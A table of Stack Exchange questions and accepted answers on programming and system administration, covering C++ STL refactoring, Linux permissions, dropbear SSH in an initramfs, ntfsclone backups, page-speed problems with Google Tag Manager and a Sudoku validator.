id (stringlengths 5-27) | question (stringlengths 19-69.9k) | title (stringlengths 1-150) | tags (stringlengths 1-118) | accepted_answer (stringlengths 4-29.9k, nullable) |
---|---|---|---|---|
_codereview.163099 | I want to change the legacy C-style code by using stl:for (posEmptyItem = startAt; strlen(collection[posEmptyItem]) > 10; posEmptyItem++) {}std::cout << posEmptyItem << std::endl;This code seems a bit hard to read. Anyway to do better?auto it = std::find_if(collection + startAt, collection + COLLECTION_SIZE, [](const char* line) { return strlen(line) <= 10; });int idx = std::distance(collection, it); Below a complete example:#include <cstring>#include <iostream>#include <algorithm>#define COLLECTION_SIZE 250int main(){ const char* collection[COLLECTION_SIZE]{ time11,time2,time3, time12,time2,time3, time13,time2,time3, time14,time2,time3, time15,time2,time3, x\n, }; auto startAt = 2; int posEmptyItem; // legacy code for (posEmptyItem = startAt; strlen(collection[posEmptyItem]) > 10; posEmptyItem++) {} std::cout << posEmptyItem << std::endl; // replace the loop to search an index by calling to standard library auto it = std::find_if(collection + startAt, collection + COLLECTION_SIZE, [](const char* line) { return strlen(line) <= 10; }); posEmptyItem = std::distance(collection, it); std::cout << posEmptyItem << std::endl; return 0;} | Retrieve the index of the first element using a predicate | c++;iterator | For easier readability you could extern the lambda expression form the find_if():auto pred = [](const char* line) { return strlen(line) <= 10; };auto it = std::find_if(collection + startAt, collection + COLLECTION_SIZE, pred);Also make use of std::begin() and std::end():auto it = std::find_if(std::begin(collection) + startAt, std::end(collection), pred);At least (but probably not last), don't use raw arrays. Rather change collection to a std::array:std::array<const char*,COLLECTION_SIZE> collection { time11,time2,time3 , time12,time2,time3 , time13,time2,time3 , time14,time2,time3 , time15,time2,time3 , x\n , };// Note my formatting style above, which makes it easier to extend the arrayHere's the fully refactored code:#include <cstring>#include <iostream>#include <algorithm>#include <array>const size_t COLLECTION_SIZE = 250; // rather use a const variable than a macroint main(){ std::array<const char*,COLLECTION_SIZE> collection { time11,time2,time3 , time12,time2,time3 , time13,time2,time3 , time14,time2,time3 , time15,time2,time3 , x\n , }; size_t startAt = 2; // care about the correct type. auto would leave you with int // replace the loop to search an index by calling to standard library auto pred = [](const char* line) { return strlen(line) <= 10; }; auto it = std::find_if(std::begin(collection) + startAt, std::end(collection), pred); auto posEmptyItem = std::distance(std::begin(collection), it); std::cout << posEmptyItem << std::endl; return 0;}See Live Demo |
_unix.363291 | I've mounted an Amazon EBS volume on /media/scientist/data1. scientist is the username. However, once in scientist, I can't do an ls command on it. See as follows: scientist@ip-10-30-10-239:/media$ ls -l total 4 d-wx-wx--x 3 scientist scientist 4096 May 5 19:24 scientist scientist@ip-10-30-10-239:/media/scientist$ ls ls: cannot open directory '.': Permission denied However, if I go one directory further it works fine: scientist@ip-10-30-10-239:/media/scientist/data1$ ls intex lost+found The command I ran was sudo chown -R scientist /media/scientist. | Linux permission on mounted drive | files;permissions | You do not have read privileges on this directory: d-wx-wx--x. Directory ownership does not give you privileges to read its content. To fix that problem, run the following command: sudo chmod u+rwx /media/scientist I encourage you to read: [chown manpage] [chmod manpage] |
_webmaster.104054 | I'm having quite a problem. A client's site speed is quite poor, both in GTmetrix and Google Insights. After doing all the usual stuff and good practices I managed to get it to 98% in GT (from 65) and 70 in Insights (from 54). However, those numbers are only real if I don't use GTM.If I use GTM, it starts to add external resources like mad, see example below (edited for privacy)https://mpp.mxptint.net/3/19718/?rnd=1379868585https://idsync.rlcdn.com/887036.gif?partner_uid=R4E83E_8DAB07C8_16BF9C8Dhttps://idsync.rlcdn.com/887036.gif?partner_uid=R4E83E_8DAB07C8_16BF9C8D&redirect=1https://sync.mathtag.com/sync/img?mt_exid=10017&redir=https%8A%3F%3Fidsync.rlcdn.com%3F47154.gif%8Fpartner_uid%8D%5BMM_UUID%5Dhttps://sync.mathtag.com/sync/img?mt_exid=10017&redir=https%8A%3F%3Fidsync.rlcdn.com%3F47154.gif%8Fpartner_uid%8D%5BMM_UUID%5D&mm_bnc&mm_bcthttps://idsync.rlcdn.com/47154.gif?partner_uid=db8a58ae-e040-4b00-be05-7b8d7e8a7e74Remove the following redirect chain if possible:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/988097477/?random=1487790148053&cv=8&fst=1487790148053&num=1&fmt=8&guid=ON&u_h=861&u_w=1034&u_ah=861&u_aw=1034&u_cd=34&u_his=1&u_tz=-480&u_java=false&u_nplug=1&u_nmime=3&frm=0&url=https%8A%3F%3FxxxxXXXXXxxx.com%3F&tiba=xxxx%30XXXXX%30xxx%30%7C%30Your%30health.%30Your%30XXXXX.&async=1https://www.google.com/ads/user-lists/988097477/?fmt=8&num=1&cv=8&frm=0&url=https%8A%3F%3FxxxxXXXXXxxx.com%3F&random=8019846090&fpvtc=/988097477/%8Frandom%8D665770418%36cv%8D8%36fst%8D1487790000000%36num%8D1%36fmt%8D8%36guid%8DON%36u_h%8D861%36u_w%8D1034%36u_ah%8D861%36u_aw%8D1034%36u_cd%8D34%36u_his%8D1%36u_tz%8D-480%36u_java%8Dfalse%36u_nplug%8D1%36u_nmime%8D3%36frm%8D0%36url%8Dhttps%358A%353F%353FxxxxXXXXXxxx.com%353F%36tiba%8Dxxxx%3530XXXXX%3530xxx%3530%357C%3530Your%3530health.%3530Your%3530XXXXX.%36async%8D1https://www.google.ca/ads/user-lists/988097477/?fmt=8&num=1&cv=8&frm=0&url=https%8A%3F%3FxxxxXXXXXxxx.com%3F&random=8019846090&fpvtc=/988097477/%8Frandom%8D665770418%36cv%8D8%36fst%8D1487790000000%36num%8D1%36fmt%8D8%36guid%8DON%36u_h%8D861%36u_w%8D1034%36u_ah%8D861%36u_aw%8D1034%36u_cd%8D34%36u_his%8D1%36u_tz%8D-480%36u_java%8Dfalse%36u_nplug%8D1%36u_nmime%8D3%36frm%8D0%36url%8Dhttps%358A%353F%353FxxxxXXXXXxxx.com%353F%36tiba%8Dxxxx%3530XXXXX%3530xxx%3530%357C%3530Your%3530health.%3530Your%3530XXXXX.%36async%8D1&ipr=y&ulfeg=nAnd it gets me down to 87 in GT and 60 in Insights, not to mention the load speed grows 1 second. Take GTM off... back to high speed. Add it again... horrible.SO my question is: is there a way to load GTM without affecting load times? I could take a small hit, just not this ridiculously bad (note: teh GTM code came with the site, so there's a chance it's wrong) | How can I improve site speed while using Google Tag Manager? | google analytics;page speed | null |
_unix.102515 | I am new to the Linux and Unix environment. I have built a Pro*C API for C++ and Oracle interaction, which is much easier to use than the conventional Pro*C technology. If you are using Pro*C then you might be aware of its pain: you need to write a .pc file, then using the Oracle precompiler you compile the code to get a .cpp file, then compile it again to get the .o (executable file). To make the process easier I created an API which provides the programmer with built-in classes and functions, so that he/she can use it to speed up development of C++ and Oracle SQL. Now, I want to host the API as freeware so that one can download it with apt-get on their respective system. How can I host my file over apt-get? | Host freeware API over apt-get | apt;repository | null |
_computerscience.292 | I don't know any shader languages. I've heard of GLSL and HLSL, and I'm interested in learning one or both.Are there significant differences between them that would make one or other better in certain situations? Is it useful to know both or would either cover most needs?I don't want vague answers indicating personal preference. I'm looking for specific measurable differences so that I can decide for myself which will suit me best. I don't have a specific task in mind - I'm hoping to discover whether there is one or other that I can learn and then apply to any future tasks, rather than having to learn a new language for each new task.If there are other shader languages which I have not mentioned I would be interested to hear the comparison for those too, provided they are not dependent on any particular GPU manufacturer. I want my code to be portable across different graphics cards. | What factors affect which shader language to learn? | gpu;glsl;shader;hlsl | null |
_cogsci.16208 | Well, I hear this saying all the time, and one guy said that we should all just admit that this means that some folks are not smart enough for college. | The saying "College is not for everyone"... is that just a euphemism for those who are not intelligent? | cognitive psychology;intelligence;educational psychology;iq;procedural memory | null |
_unix.32599 | I wanted to make a script which ran automatically on login so I put it into the file ~/bash.profile, but it didn't run. When I put it in bashrc, it ran on opening a terminal.What I was doing in the script was accessing a file in the pictures folder.I just added ./script.sh in ~/.bash_profile. How to make it run on login?I'm using Unity on Ubuntu 11.10. | Auto running bash script on login | bash;ubuntu;login;profile;unity | .profile and .bash_profile are files that are sourced by bash when running as a login shell such as when logging in from the Linux Text console or using SSH. They are not sourced when loading a new shell from an existing login such as when opening a new terminal window inside Unity or other graphical environment. .bashrc on the other hand is only sourced for non-login shells, though sometimes distros will source .bashrc manually from within the default .bash_profile. One workaround is to change Gnome Terminal to load the shell as a login shell from it's profile preferences, but then that would run every time you open up a new terminal window. Another option is to add it to the list of Startup Applications as suggested by @jrg. |
_webapps.73478 | I am designing a Google Form for managing a congress registration process. I need to have a unique ID number for each registration and I found an answer here: Can I add an autoincrement field to a Google Spreadsheet based on a Google Form? It was certainly very useful, but there is one little problem I cannot solve. As the form has non-required fields, the answers are different in length, so the ID is placed in different columns. I think the line in the code that controls the column where the ID is placed is this one (line 21): var column = eventRange.getLastColumn() + 1; Is there a way to place the ID in a specific column, say column C? | Auto increment ID in Google Forms | google spreadsheets;google apps script | Just replace eventRange.getLastColumn() + 1 with a number. Column A is 1, B is 2, etc. So if you want the ID to be placed in column C, change the code to var column = 3; |
_webapps.51779 | I'm the sort of person who doesn't like to unfriend people on Facebook unless I actually dislike them, so I have quite a few friends that post stuff I really don't care about. Naturally, when I discovered that you can set people as acquaintances I went through my list acquaintancing people. This worked quite well for a while, but recently the little ticker thing above the chat sidebar has been full of updates from acquaintances. My newsfeed is still only stuff I actually care about, but the ticker is about 70% stuff that doesn't interest me, so I want to see if I can get it back to how it was before.Is this just how acquaintances work now, or is there something I can do to keep my acquaintances out of the ticker? | Acquaintances Showing up in Facebook Ticker | facebook | null |
_unix.125060 | This is mostly aimed at Debian/Ubuntu, but I feel savvy enough on a variety of distros to be able to adapt the solution for one distro to another.Here's my scenario. There are a few situations when the boot process will drop you to the shell (usually busybox) of the initrd. Most notably whenever you run a hardware RAID for which drivers have to be rebuilt for each and every new kernel revision. I'd like to be able to access the rescue system the same way as I would access the fully booted system.I reckon it'd be possible to put static builds of the shell(s) and sshd (OpenSSH or dropbear) into the initrd and have been looking for an existing solution that I can adjust to my needs.Assuming there is no existing solution (since I have searched for quite a while) what do I need to consider aside from using static builds where possible (or supply the libs)? Is it reasonable to simply cache a static build of dropbear and use /etc/initramfs-tools/hooks to embed that along with a converted OpenSSH sshd_config and the original host keys? | Are there any canned solutions for running sshd in the initrd? | linux;sshd;initrd;rescue | Ubuntu 16.04 contains a package called dropbear-initramfs which is supposed to provide this feature.Lightweight SSH2 server and client - initramfs integration dropbear is a SSH 2 server and client designed to be small enough to be used in small memory environments, while still being functional and secure enough for general use.It implements most required features of the SSH 2 protocol, and other features such as X11 and authentication agent forwarding.This package provides initramfs integration.The only items I needed to adjust in addition to installing said package where:Uncomment the commented out DROPBEAR=y inside /etc/initramfs-tools/conf-hooks.d/dropbearConvert my existing host keys (see below)Create and populate /etc/initramfs-tools/root/.ssh/authorized_keys. For this I opted to bind-mount /root/.ssh onto /etc/initramfs-tools/root/.sshA final update-initramfs -u -k all re-created all the initrd imagesTo convert the keys I ran these commands:/usr/lib/dropbear/dropbearconvert openssh dropbear /etc/ssh/ssh_host_rsa_key /etc/initramfs-tools/etc/dropbear/dropbear_rsa_host_key/usr/lib/dropbear/dropbearconvert openssh dropbear /etc/ssh/ssh_host_dsa_key /etc/initramfs-tools/etc/dropbear/dropbear_dss_host_key/usr/lib/dropbear/dropbearconvert openssh dropbear /etc/ssh/ssh_host_ecdsa_key /etc/initramfs-tools/etc/dropbear/dropbear_ecdsa_host_keyNote: the source and target file names differ. So don't make assumptions here. Also, /usr/lib/dropbear isn't in my PATH, so I needed to give the full path to execute dropbearconvert. |
_codereview.160589 | my code is for menu. In the exit case of the menu it must count how many times are used options 1 and 2. No matter how many times I choose 1 and 2, when I choose 3 it gives me 0 for counter1 and counter2 and I can't find out why. The code for passive class: public final class Service { private int x; public Service(int x) { setX(x); } public double getX() { return x; } public void setX(int x) { this.x = x; } public void displayMenu() { for (int i = 0; i < 60; i++) { System.out.println(); } System.out.printf(%s, Choose number\n + 1.business account \n + 2.Account for person\n + 3.Exit\n ); } public void doSelection(int choice) { int counter1 = 0; int counter2 = 0; switch (choice) { case 1: counter1++; ServiceNumber newNumber = new ServiceNumber(1,1); JOptionPane.showMessageDialog(null, newNumber.toString()); for (int i = 0; i < 60; i++) { System.out.println(); } break; case 2: counter2++; ServiceNumber newNumber2 = new ServiceNumber(2,2); JOptionPane.showMessageDialog(null, newNumber2.toString()); for (int i = 0; i < 60; i++) { System.out.println(); } break; case 3: System.out.printf(How many times have you chosen option 1 %d\n + How many times have you chosen option2: %d\n, counter1, counter2); System.exit(0); break; } } public void getUserChoice() { do { displayMenu(); Scanner input = new Scanner(System.in); int choice; choice = input.nextInt(); while (choice < 1 || choice > 3) { System.out.println(Enter new code); choice = input.nextInt(); } doSelection(choice); } while (true);The active class: public class ServiceTest { public static void main(String[] args) { Service newNumber=new Service(0); newNumber.getUserChoice(); | Why this code doesn't work | java | Your variables are local variables.int counter1 = 0;int counter2 = 0;will be reset every call to doSelection().declare them outside of the method to maintain state between calls.public void doSelection(int choice) {int counter1 = 0;int counter2 = 0;should be changed toint counter1 = 0;int counter2 = 0;public void doSelection(int choice) { |
_unix.203292 | I know there are similar questions to this but none specific to RAID 10 extracted from a NAS, so any help is greatly appreciated.So, basically the NAS is kaput but the drives are ok. Following the advice of the Seagate tech who basically said that replacing the NAS would format the drives upon start-up I want to connect the drives to a Linux PC and use MDADM to create a software array and recover the data.The problem is I have no idea how to use MDADM and influenced from other horror stories I do not want to risk using the wrong command and corrupting the data.Based on what I have read I should connect the drives via SATA to my linux PC, boot up, open a root terminal and run the following:mdadm --assemble --scanAnd then magically the drive will appear in the file manager and I can just copy the files?Am I missing something or is this too easy? Also, is the command ok?Thanks for helping ;) | Data Recovery from a 4-Disk NAS RAID 10 | linux;data recovery;mdadm;nas | The horror stories are from people running mdadm --create because they want to create a new array using existing array components. What --create does is to create a new, empty array, using existing disks or partitions (and overwriting what they used to contain).Each volume in an array contains a header which includes UUID of the array as well as information as to where it fits in the array. This allows mdadm to reconstruct arrays simply by presenting their components and letting it sort out which volumes go together and how to use them. The header content is what determines how a volume is used, not how the volume is connected to the computer. If enough volumes are present, you shouldn't need to do anything other than mdadm --assemble --scan.Running mdadm --assemble without --force won't destroy your data. |
_unix.265720 | If I run: sftp -oServerAliveInterval=10 server-2 the connection is established. But after decreasing the value from 10 to 1: sftp -oServerAliveInterval=1 server-2 I am unable to connect: Connecting to server-2... Connection closed by 10.0.1.10 Couldn't read packet: Connection reset by peer Any ideas why? Added -vvv: debug1: SSH2_MSG_SERVICE_ACCEPT received debug2: key: id_rsa (0xxxxxxxxxxx) Connection to 10.0.1.10 timed out while waiting to read Couldn't read packet: Connection reset by peer | ServerAliveInterval and connection reset | linux;ssh;networking;sftp | Solved. The issue was caused by an internal bug in the app server running on the Windows machine. |
_softwareengineering.120927 | I'm on the way developing a Java application where user can provide a class diagram and get the corresponding Java code.I don't know how can I let the user interactively draw a class diagram in Java. I am currently getting the required parameters like attributes, functions directly from the user, and then I render a class diagram for him. I show the class diagram on a jdialog.But when it comes to multiple class diagrams, it screws me. Is there a better way to do this?This is an example of a class diagram, I need to generate this from a Java program, given the values and relationship. | Java code generation from class diagram | java;algorithms;class diagram | First point: this is fairly non-trivial. Second point: the fact that the Java environment makes the Java compiler directly available will help a lot in implementing this. I believe you should be able to collect most (all?) the information you need by walking the AST with the compiler tree API. At least from the looks of things, the part you'll care the most about will be the ClassTree interface. So, the basic idea would be to create your tree visitor, walk the tree, and collect information about the ClassTree objects you find.Once you've collected the information, it becomes mostly a matter of drawing a nicely formatted result. If you have some funds available, I've heard good things about yFiles for Java (I should also mention that the same company's yWorks UML Doclet is supposed to do nearly what you're talking about, but from JavaDac comments rather than the source itself). There are, as you'd expect, lots of alternatives to that as well. I don't know enough about most (any?) of them to comment further on them though (I did use GraphViz once, but so long ago that I don't remember much, and what little I might remember is probably obsolete anyway). |
_softwareengineering.198195 | Wonder if anyone could shed some light on this messaging construct:The documentation says that messages appear btwn brackets [] andthat the msg target/object is on the left, whilst the msg itself (and any parameters) is on the right:[msgTarget msg], e.g., [myArray insertObject:anObject atIndex:0]OK, simple enough... but then they introduce the idea that it's convenient to nest msgs in lieu of the use of temporary variables--I'll take their word for it--so the above example becomes:[[myAppObject theArray] insertObject:[myAppObject objectToInsert] atIndex:0]In other words, [myAppObject theArray] is a nested msg, one, and, two, 'theArray' is the 'message'. Well, to say I find this confusing is a bit of an understatement ... Maybe it's just me but 'theArray' doesn't evoke a message semantically or grammatically. What this looks like to a guy who knows Java is a type/class. In Java we do things likeClass objectInstance = new Class() ... the bit to the left of the assignment operator is what this so-called nested message reminds me of ... with object and class/type positions switched of course. Anyway, any insight much appreciated. | Objective C - nested messages ... confusion about | objective c;syntax;semantics;message passing | In Objective-C, by convention, you refer to properties with dot notation. Thus, you write myAppObject.theArray instead [myAppObject theArray]. In Objective-C the default getter is the name of the variable instead getVariable. For example, writing@property NSArray *theArray;creates an instance variable _theArray and generates the following accessor:-(NSArray*) theArray { return _theArray; }So by sending theArray as a message you are actually invoking a method. But again, use only dot notation for properties. |
_cs.7831 | The cyclic shift (also called rotation or conjugation) of a language $L$ is defined as $\{ yx \mid xy \in L \}$. According to wikipedia (and here) the context-free languages are closed under this operation, with references to papers from Oshiba and from Maslov. Is there an easy proof of this fact? For regular languages the closure is discussed in this form as Prove that regular languages are closed under the cycle operator. | Easy proof for context-free languages being closed under cyclic shift | formal languages;context free;closure properties | You can try to use pushdown automata. Given a pushdown automaton for the original language, we construct one for the cyclic shift. The new automaton operates in two stages, corresponding to the $y$ and the $x$ part of the word $yx$ (where $xy$ is in the original language). In the first stage, whenever the automaton would like to pop a non-terminal $A$, it can instead push a non-terminal $A'$; the idea is that at the end of the first stage, the stack would contain, in reverse order, the symbols that are found in the stack after reading $x$ by the original automaton. In the second stage (the switch is non-deterministic), instead of pushing a non-terminal $A$, we are allowed to pop a non-terminal $A'$. If the original automaton can indeed generate the stack upon reading $x$, then the new one would be able to exactly pop the entire stack.Edit: Here are some more details. Suppose we are given a PDA with alphabet $\Sigma$, set of states $Q$, set of accepting states $F$, non-terminals $\Gamma$, initial state $q_0$, and a set of allowable transitions. Each allowable transition is of the form $(q,a,A,q',\alpha)$, meaning that when in state $q$, upon reading $a \in A$ (or $a = \epsilon$, in which case it's a free transition), if the top-of-stack is $A \in \Gamma$ (or $A = \epsilon$, which means stack is empty), then the PDA can (it's a non-deterministic model) move to state $q'$, replacing $A$ with $\alpha \in \Gamma^*$.The new PDA has a new non-terminal $A'$ for each $A \in \Gamma$. For every two states $q,q' \in Q$ and $A \in \Gamma \cup \{\epsilon\}$, there are two states $(q,q',1),(q,q',2,A)$. The starting states (the actual starting state is chosen non-deterministically among them via $\epsilon$-transitions) are $(q,q,1)$. For each transition $(q,a,A,q',\alpha)$ there are corresponding transitions $((q,q'',1),a,A,(q',q'',1),\alpha)$ and $((q,q'',2,B),a,A,(q',q'',2,B),\alpha)$. There are other transitions as well.For each transition $(q,a,A,q',\alpha)$, there are transitions $((q,q'',1),a,B',(q',q'',1),B'A'\alpha)$, where $B \in \Gamma \cup \{\epsilon\}$ and $\epsilon' = \epsilon$. For every final state $q \in F$, there are transitions $((q,q'',1),\epsilon,A,(q_0,q'',2,\epsilon),A)$, where $A \in \Gamma \cup \{\epsilon\}$.For every transition $(q,a,\epsilon,q',\alpha)$, there are transitions $((q,q'',2,A),a,B',(q',q'',2,A),B'\alpha)$, where $A \in \Gamma \cup \{\epsilon\}$. For every transition $(q,a,\epsilon,q',A)$, there are transitions $((q,q'',2,B),a,A',(q',q'',2,A),\epsilon)$, where $B \in \Gamma \cup \{\epsilon\}$. For every transition $(q,a,A,q',B)$, there are generalized transitions $((q,q'',2,C),a,B'A,(q,q'',2,C),\epsilon)$; these are implemented as a sequence of two transitions through an intermediate new state. Transitions $(q,a,\epsilon,q',\alpha)$ with $|\alpha| \geq 2$ are handled similarly. For every transition $(q,a,A,q',A)$, there are transitions $((q,q'',2,A),a,B,(q',q'',2,A),B)$, where $B \in \Gamma' \cup \{\epsilon\}$. 
Transitions $(q,a,A,q',A\alpha)$ are handled similarly. Finally, there is a sole final state $f$, and transitions $((q,q,2,A),\epsilon,\epsilon,f,\epsilon)$.(There might be a few transitions that I missed, and some of the details that I'm omitting are somewhat messy.)Recall we're trying to accept a word $yx$, where $xy$ is accepted by the original PDA. A state $(q,q',1)$ means that we're at stage 1, at state $q$, and the original PDA is at state $q'$ after reading $x$. A state $(q,q',2,A)$ is similar, where $A$ corresponds to the last $A'$ that was popped. At stage 1, we are allowed to push $A'$ instead of popping $A$. We do that for each non-terminal that is produced while processing $x$, but only popped while processing $y$. At stage 2, we are allowed to pop $A'$ instead of pushing $A$. If we do this, then we have to remember that the top-of-stock is really $A$; this only applies when there are no temporary things on the stack, which in the simulated PDA is the same as the top-of-stack being $\epsilon$ or of the form $B'$.Here is a simple example. Consider an automaton for $x^n y^n$ that pushes $A$ for each $x$, and pops $A$ for each $y$. The new automaton accepts words of two forms: $y^k x^n y^{n-k}$ and $x^k y^n x^{n-k}$. For words of the first form, stage 1 consists of pushing $k$ times $A'$, stage 2 consists of popping $k$ times $A'$, pushing $n-k$ times $A$, and popping $n-k$ times $A$. For words of the second form, we first push $k$ times $A$, then pop $k$ times $A$, push $n-k$ times $A'$, transition to stage 2, and pop $n-k$ times $A'$.Here is a more complicated example, for the language of balanced parentheses of various types ((),[],<>) such that the immediate descendants of each type of parentheses must belong to a different type. For example, ([]<>) is OK but () is wrong. For each (, we push $A$ if the top-of-stack isn't $A$, for each ), we pop $A$. Similarly $B$,$C$ are associated with [] and <>. Here is how we accept the word >)([()]<. We consume >), pushing $C'A'$, and transition to stage 2. We consume (, popping $A'$ and remembering the top-of-stack $A$. We consume [()] , pushing and popping $BA$; when pushing $B$, we are aware that the real top-of-stack is $A$, and so square brackets are allowed (we wouldn't be fooled by >)(()<); when pushing $A$, since the top-of-stack is $B$ (which is not $\epsilon$ or of the form $X'$), then we know that $B$ is also the real top-of-stack, and so round parentheses are allowed (even though the shadow top-of-stack is $A$). Finally, we consume < and pop $C'$. |
_unix.255474 | I've got a clientmachine where I'm using a livecd to boot and backup the whole hard drive (1,8 GB is full, it has only 1 partition: NTFS as its a windows PC) onto a remote server (windows server [with a 64 bit system and filesyste on it] with a network share where I move files to).mount -t cifs //myserver/myshare -o user=user, domain=domain, password=password /mnt/gsserverdd if=/mnt/sda1 of=/mnt/gsserver/complete.binumount /mnt/sda1ntfsclone -f -o /mnt/gsserver/onlyclone2.img /dev/sda1 ntfsclone -f -o - /dev/sda1 | gzip -c > /mnt/gsserver/backup.img.gz 2>&1While the dd command executes without a hitch I got a problem with the ntfsclone command.The 2nd clone command was what I used originally....it just created a 1 kb file. In the end then I tried to use the first clone command to see if the problem stems from gzip or ntfsclone or the network.......as info here the dd command took 30 minutes to copy 23 MB of data so the network connection is quite bad.Now when I tried the first ntfsclone I was in for a surprise though:ERROR(28) ftruncate failed for file '/mnt/gsserver/onlyclone2.img': No space left on deviceDestination filesystem type is 0xff534d42The share itself has 30 GB free disk space which should be enough to save the 1,8 GB bin. So a guess of is that it has to do with the livecd boot and he tries to put up something locally before he copies (as info about the client PC here: It has only 500 MB ram), but in all honesty I'm not sure about that guess or how I could test it.What would be the reason for this error message? | ntfsclone on network no space left on device | linux;networking;ntfs | null |
_unix.148540 | See my earlier question.GRUB wouldn't recognize the XEN kernel until extra blank lines were added and the title of the GRUB entry matched the version of XEN installed on the server.I've always considered the title line to represent a label for the entry, and I never would have thought spacing would have mattered. Is there a code style guideline/wiki for GRUB with CentOS to avoid these types of issues in the future? | Why Would Spacing Matter in grub.conf? | centos;grub | null |
_codereview.148354 | Rather than checking if my angle is in the range of 0 to 2pi every time it gets set, I got the idea to store it as an unsigned short with 0xFFFF being +2pi, thus the standard overflow behavior for unsigned numbers should keep it bound to the desired range.Is it a good idea to do it this way, or is there something I'm missing?#ifndef ANGLE_H#define ANGLE_H#include <cstdint>class Angle{//static constexpr long double _PI = 3.1415926535897932384626433832795028841971693993751058209749445923078164062862089986280348; static constexpr long double _TWO_PI = 6.2831853071795864769252867665590057683943387987502116419498891846156328125724179972560696; static inline __attribute((always_inline)) __attribute((pure)) uint16_t uint16_from_double(const double a) { return (a * 0x00010000) / _TWO_PI; } uint16_t _theta; Angle(uint16_t theta) : _theta(theta) { }public: Angle(double t = 0) : _theta(uint16_from_double(t)); { } inline operator double() const { return radians(); } inline double radians() const { return ((double) _theta) / 0x00010000) * _TWO_PI; } inline double degrees() const { return ((double) _theta) / 0x00010000) * 360; }//everything is less than and greater than everything else, because it's a circle//so return if subtracting will get us there faster than adding... inline bool operator<(const Angle & it) const { return _theta < it._theta? (it._theta - _theta) < 0x00008000 : (_theta - it._theta) >= 0x00008000; } inline bool operator<=(const Angle & it) const { return _theta < it._theta? (it._theta - _theta) <= 0x00008000 : (_theta - it._theta) > 0x00008000; } inline bool operator>(const Angle & it) const { return _theta < it._theta? (it._theta - _theta) > 0x00008000 : (_theta - it._theta) <= 0x00008000; } inline bool operator>=(const Angle & it) const { return _theta < it._theta? (it._theta - _theta) >= 0x00008000 : (_theta - it._theta) < 0x00008000; } inline Angle minDelta(const Angle & it) const { uint16_t i = _theta < it._theta? it._theta - _theta : _theta - it._theta; return Angle(i < 0x00007FFF? i : 0x00010000 - i); } inline const Angle & operator=(double a) { _theta = uint16_from_double(a); return *this; } inline const Angle & operator+=(double a) { _theta += uint16_from_double(a); return *this; } inline const Angle & operator-=(double a) { _theta -= uint16_from_double(a); return *this; } inline const Angle & operator*=(double a) { _theta *= a; return *this; } inline const Angle & operator/=(double a) { _theta /= a; return *this; }};#endif // ANGLE_H | Storing angles with overflow errors | c++;integer;floating point;coordinate system | null |
_codereview.169149 | At CodeFights I found a question about the validity of Sudoku grid. Given a grid, return true if it is valid, return false otherwise. The grid is valid when each row, each column and each 3x3 sub grid contains at most one occurrence of the numbers 1 to 9.I solved it using C# and I would like some feedback on my solution.The provided grid is guaranteed to be 9x9 and to only contain the characters 1 through 9 and . (for empty cells). So I did not include any error checking. Solutionusing System;public static class Program{ public static void Main() { char[][] grid = { new char[] {'.', '.', '.', '1', '4', '.', '.', '2', '.'}, new char[] {'.', '.', '6', '.', '.', '.', '.', '.', '.'}, new char[] {'.', '.', '.', '.', '.', '.', '.', '.', '.'}, new char[] {'.', '.', '1', '.', '.', '.', '.', '.', '.'}, new char[] {'.', '6', '7', '.', '.', '.', '.', '.', '9'}, new char[] {'.', '.', '.', '.', '.', '.', '8', '1', '.'}, new char[] {'.', '3', '.', '.', '.', '.', '.', '.', '6'}, new char[] {'.', '.', '.', '.', '.', '7', '.', '.', '.'}, new char[] {'.', '.', '.', '5', '.', '.', '.', '7', '.'} }; var sudoku = new Sudoku(grid); Console.WriteLine(sudoku.IsValid()); }}public class Sudoku{ char[][] _grid; public Sudoku(char[][] grid) { _grid = grid; } public bool IsValid() { return RowsAreValid() && ColumnsAreValid() && SquaresAreValid(); } bool RowsAreValid() { return Validate(GetNumberFromRow); } bool ColumnsAreValid() { return Validate(GetNumberFromColumn); } bool SquaresAreValid() { return Validate(GetNumberFromSquare); } bool Validate(Func<int, int, int> numberGetter) { for (var row = 0; row < 9; row++) { var usedNumbers = new bool[10]; for (var column = 0; column < 9; column++) { var number = numberGetter(row, column); if (number != 0 && usedNumbers[number] == true) { return false; } usedNumbers[number] = true; } } return true; } int GetNumberFromRow(int row, int column) { return ToNumber(_grid[row][column]); } int GetNumberFromColumn(int row, int column) { return ToNumber(_grid[column][row]); } int GetNumberFromSquare(int block, int index) { var column = 3 * (block % 3) + index % 3; var row = index / 3 + 3 * (block / 3); return ToNumber(_grid[row][column]); } int ToNumber(char c) { if (c == '.') return 0; return (int)(c - '0'); }} | Check if a given grid is a valid Sudoku | c#;programming challenge;array;game;sudoku | null |
_webapps.9731 | When I am commenting on Facebook, how do I insert a new line. Let us say, that I post a status. Friend A comments on it, followed by Friend B, followed by Friend C. I am now posting a reply and I want it formatted as follows. @FriendA: ..........@FriendB: ..........@FriendC: ..........If I were to press Enter after I have written the response for FriendA, it posts that message. | Adding a New Line on Facebook Comment | facebook;formatting | To add a newline, simply type Shift+Enter. This will insert a newline character (thus making a new line) rather than enter, which causes the form to submit. Note that in some cases, Facebook strips newline characters, and it isn't consistent. For example, you can type newlines into status updates, and it will show the line breaks on your wall and in the newsfeed, but not at the top of your profile. |
_softwareengineering.313087 | We're working on a bugtracking system.Our design has a BugReport class that represents the filing of a bug of some Project in the system. BugReports have tags, representing the state/progress of the BugReport. Possible tags are e.g. New, Closed, Duplicate, Under Review, ...Tags have no responsibility other than representing the progress of the BugReport. Except for one special type of tag, Duplicate. Duplicate means that the BugReport is actually a duplicate of another BugReport in the system. When a user tags a BugReport as Duplicate, he should indicate of which BugReport the BugReport is a Duplicate of.I'm having trouble to design this part. As said before, most tags only have the functionality of representing the progress of the BugReport. Except for one (maybe more in the future) which also has the functionality to point to another BugReport.A simple enum would've sufficed if not for the Duplicate part, but I have no idea how to provide the extra functionality of Duplicate? | How do I model similar types that have different data? | design | null |
_cs.12092 | This is something I've been wondering for years. Software like Mathematica is great at manipulating expressions into simplified, factorized, and other forms. I'm wondering if there's a way, theoretically and/or practically, to find the form that has the fewest operations. The next step would be to prefer operations that are faster (ie. multiply instead of divide). Lastly, to find a form that maximizes extraction of repetitive subexpressions, so that the subexpressions can be evaluated once and substituted for potentially significant performance gains. Has any research been done in this area? Thanks. | Using a computer algebra system to optimize mathematical expressions | optimization;computer algebra | null |
